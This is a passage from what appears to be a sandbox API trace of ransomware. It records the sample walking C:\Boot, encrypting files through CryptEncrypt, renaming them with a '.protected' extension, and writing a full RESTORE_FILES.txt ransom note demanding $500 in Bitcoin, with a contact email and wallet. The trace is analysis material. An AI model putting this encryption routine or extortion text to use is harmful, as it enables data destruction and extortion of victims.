lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Program Files (x86)") returned -1 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$Recycle.bin") returned 0 [0044.549] FindNextFileW (in: hFindFile=0x4472f8, 
lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="Program Files") returned -1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="Program Files (x86)") returned -1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="$Recycle.bin") returned 1 [0044.549] lstrcmpiW (lpString1="Boot", lpString2="System Volume Information") returned -1 [0044.549] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0044.549] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0044.549] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0044.550] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0044.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0044.550] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.550] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.550] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.550] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.550] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.550] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0044.550] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.550] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.550] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.550] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.550] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4695e0*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x4695e0*, 
pdwDataLen=0x295f634*=0x30) returned 1 [0044.550] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\." (normalized: "c:\\boot\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.550] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.550] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.550] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.550] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0044.551] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.551] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.551] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0044.551] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0044.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.551] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.551] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="Program Files") returned -1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="Program Files (x86)") returned -1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="$Recycle.bin") returned 1 [0044.551] lstrcmpiW (lpString1="BCD", lpString2="System Volume Information") returned -1 [0044.551] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0044.551] StrStrIW (lpFirst="BCD", lpSrch=".protected") returned 0x0 [0044.551] lstrcmpW (lpString1="BCD", lpString2="RESTORE_FILES.txt") returned -1 [0044.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.551] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.551] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files") returned -1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files (x86)") returned -1 [0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="$Recycle.bin") returned 1 
[0044.551] lstrcmpiW (lpString1="BCD.LOG", lpString2="System Volume Information") returned -1 [0044.551] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0044.551] StrStrIW (lpFirst="BCD.LOG", lpSrch=".protected") returned 0x0 [0044.551] lstrcmpW (lpString1="BCD.LOG", lpString2="RESTORE_FILES.txt") returned -1 [0044.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.552] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.552] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files") returned -1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files (x86)") returned -1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$Recycle.bin") returned 1 [0044.552] lstrcmpiW (lpString1="BCD.LOG1", lpString2="System Volume Information") returned -1 [0044.552] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".protected") returned 0x0 [0044.552] lstrcmpW (lpString1="BCD.LOG1", lpString2="RESTORE_FILES.txt") returned -1 [0044.552] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.552] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.552] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.552] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrW (lpFirst="BCD.LOG1", lpSrch=".txt") returned 0x0 [0044.552] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrW (lpFirst="BCD.LOG1", lpSrch=".rar") returned 0x0 [0044.552] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0044.552] StrStrW (lpFirst="BCD.LOG1", lpSrch=".zip") returned 0x0 [0044.552] ReadFile (in: hFile=0xa4, lpBuffer=0x46a660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesRead=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.553] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.553] WriteFile (in: hFile=0xa4, lpBuffer=0x46a660*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesWritten=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.553] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.553] WriteFile (in: hFile=0xa4, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0044.553] WriteFile (in: hFile=0xa4, lpBuffer=0x46a5e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a5e8*, lpNumberOfBytesWritten=0x295f654*=0x30, 
lpOverlapped=0x0) returned 1 [0044.554] CloseHandle (hObject=0xa4) returned 1 [0044.555] wnsprintfW (in: pszDest=0x46a660, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1.protected") returned 30 [0044.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG1.protected" (normalized: "c:\\boot\\bcd.log1.protected")) returned 1 [0044.556] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files") returned -1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files (x86)") returned -1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$Recycle.bin") returned 1 [0044.556] lstrcmpiW (lpString1="BCD.LOG2", lpString2="System Volume Information") returned -1 [0044.556] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.556] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".protected") returned 0x0 [0044.556] lstrcmpW (lpString1="BCD.LOG2", lpString2="RESTORE_FILES.txt") returned -1 [0044.556] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.556] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.556] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.557] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.557] StrStrW (lpFirst="BCD.LOG2", lpSrch=".txt") returned 0x0 [0044.557] 
lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.557] StrStrW (lpFirst="BCD.LOG2", lpSrch=".rar") returned 0x0 [0044.557] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0044.557] StrStrW (lpFirst="BCD.LOG2", lpSrch=".zip") returned 0x0 [0044.557] ReadFile (in: hFile=0xa4, lpBuffer=0x46a660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesRead=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.557] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.557] WriteFile (in: hFile=0xa4, lpBuffer=0x46a660*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesWritten=0x295f654*=0x0, lpOverlapped=0x0) returned 1 [0044.557] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.557] WriteFile (in: hFile=0xa4, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0044.557] WriteFile (in: hFile=0xa4, lpBuffer=0x46a5e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a5e8*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0044.558] CloseHandle (hObject=0xa4) returned 1 [0044.558] wnsprintfW (in: pszDest=0x46a660, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2.protected") returned 30 [0044.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG2.protected" (normalized: "c:\\boot\\bcd.log2.protected")) returned 1 [0044.558] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) 
returned 1 [0044.558] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files") returned -1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files (x86)") returned -1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$Recycle.bin") returned 1 [0044.559] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="System Volume Information") returned -1 [0044.559] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.559] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".protected") returned 0x0 [0044.559] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0044.559] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.559] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x46a5e8*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.559] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.559] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".txt") returned 0x0 [0044.559] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.560] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".rar") returned 0x0 [0044.560] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0044.560] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".zip") returned 0x0 [0044.560] ReadFile (in: hFile=0xa4, lpBuffer=0x46a660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesRead=0x295f654*=0x2800, 
lpOverlapped=0x0) returned 1 [0044.561] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0044.561] WriteFile (in: hFile=0xa4, lpBuffer=0x46a660*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a660*, lpNumberOfBytesWritten=0x295f654*=0x2800, lpOverlapped=0x0) returned 1 [0044.561] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.561] WriteFile (in: hFile=0xa4, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0044.561] WriteFile (in: hFile=0xa4, lpBuffer=0x46a5e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x46a5e8*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0044.562] CloseHandle (hObject=0xa4) returned 1 [0044.563] wnsprintfW (in: pszDest=0x46a660, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.protected") returned 34 [0044.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.protected" (normalized: "c:\\boot\\bootstat.dat.protected")) returned 1 [0044.563] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files") returned -1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files (x86)") returned -1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="$Recycle.bin") returned 1 [0044.563] lstrcmpiW (lpString1="cs-CZ", lpString2="System Volume Information") returned -1 
[0044.563] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0044.563] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0044.563] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0044.563] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0044.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.563] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.563] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.564] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.564] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.564] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0044.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.564] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.564] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.564] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.564] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.564] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.564] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0044.564] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.564] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: 
lpFindFileData=0x295f400) returned 1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.564] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0044.564] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.564] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.564] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.564] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.564] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.564] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.564] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\RESTORE_FILES.txt") returned 35 [0044.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\RESTORE_FILES.txt" (normalized: "c:\\boot\\cs-cz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.565] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.565] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.565] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.565] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.565] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.565] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.566] CloseHandle (hObject=0xa4) returned 1 [0044.566] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0044.566] lstrcmpiW (lpString1="da-DK", 